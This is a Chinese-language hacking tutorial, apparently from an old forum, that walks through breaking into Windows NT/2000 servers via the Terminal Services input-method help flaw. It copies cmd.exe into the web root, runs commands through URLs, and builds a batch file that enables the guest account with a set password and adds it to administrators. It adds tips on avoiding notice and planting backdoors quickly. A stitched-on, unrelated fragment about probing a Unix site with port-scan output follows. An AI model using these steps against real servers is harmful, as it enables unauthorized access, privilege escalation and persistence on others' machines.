1.扫描3389 port终端服务默认;2.用终端客户端程序进行连接;3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;4.在“选项”菜单上点右键——>跳转到URL“,输入:c:winntsystem32cmd.exe.(如果不能确定NT系统目录,则输入:c:或d:……进行查找确定);5.选择”保存到磁盘“选择目录:c:inetpubs,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;6.打开IE,输入:http://ip/s/cmd.exe?/c dir怎么样?有cmd.exe文件了吧?这我们就完成了第一步;7.http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat 8.http://ip/s/cmd.exe?/c echo net user guest elise》go.bat 9.http://ip/s/cmd.exe?/c echo net localgroup administrators /add guest》go.bat 10.http://ip/s/cmd.exe?/c type go.bat看看我们的批文件内容是否如下:
net user guest /active:yes net user guest elise net localgroup administrators /add guest 11.在“选项”菜单上点右键——>跳转到URL“,输入:c:inetpubsgo.bat ——>在磁盘当前位置执行;12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢!(我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:-)
注意事项:1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!
个人观点:1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;2.url的跳转下,你将拥有超级用户的权限,好好利用吧3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)
4.此法似乎与对方的防火墙无关哦!
5.据本人实际操作,发现极易断线,但应与占用服务器资源无关。对方是384M RAM+PIII,是静态IP,主要是做数据库服务器,RAID硬盘,SCSI CD ROM,开机18天了,02:00进去时,仍时常吊线。
但是shut的HOME目录是drwx——,别的帐号根本进不去。没关系,我试试ftp,530 user shut access denined(被拒绝),users组可以ftp上去同样进不了shut目录。而且该网站根本就没有开WWW服务,怎么办?为这个网站陆陆续续研究了许久,我总是乐观的鼓励自己,“起码我已经知道几十种进不去的方法了……”。“真正的黑客从来都是把困难当作乐趣,敞开的大门你请他进他都不进呢!”如此六十多天过去了,只到有一天……
我再一次用haktek扫描该网站,结果如下:Port 21 found. Desc=’ftp’ Port 23 found. Desc=’telnet’ Port 25 found. Desc=’smtp’ Port 79 found. Desc=’finger’ Port 111 found. Desc=’portmap/sunrpc’ Port 512 found. Desc=’biff/exec’ Port 513 found. Desc=’login/who’ Port 514 found. Desc=’shell/syslog’ Port 515 found. Desc=’printer’ Port 1024 found. Port 1025 found. Port 1526 found. Port 1528 found.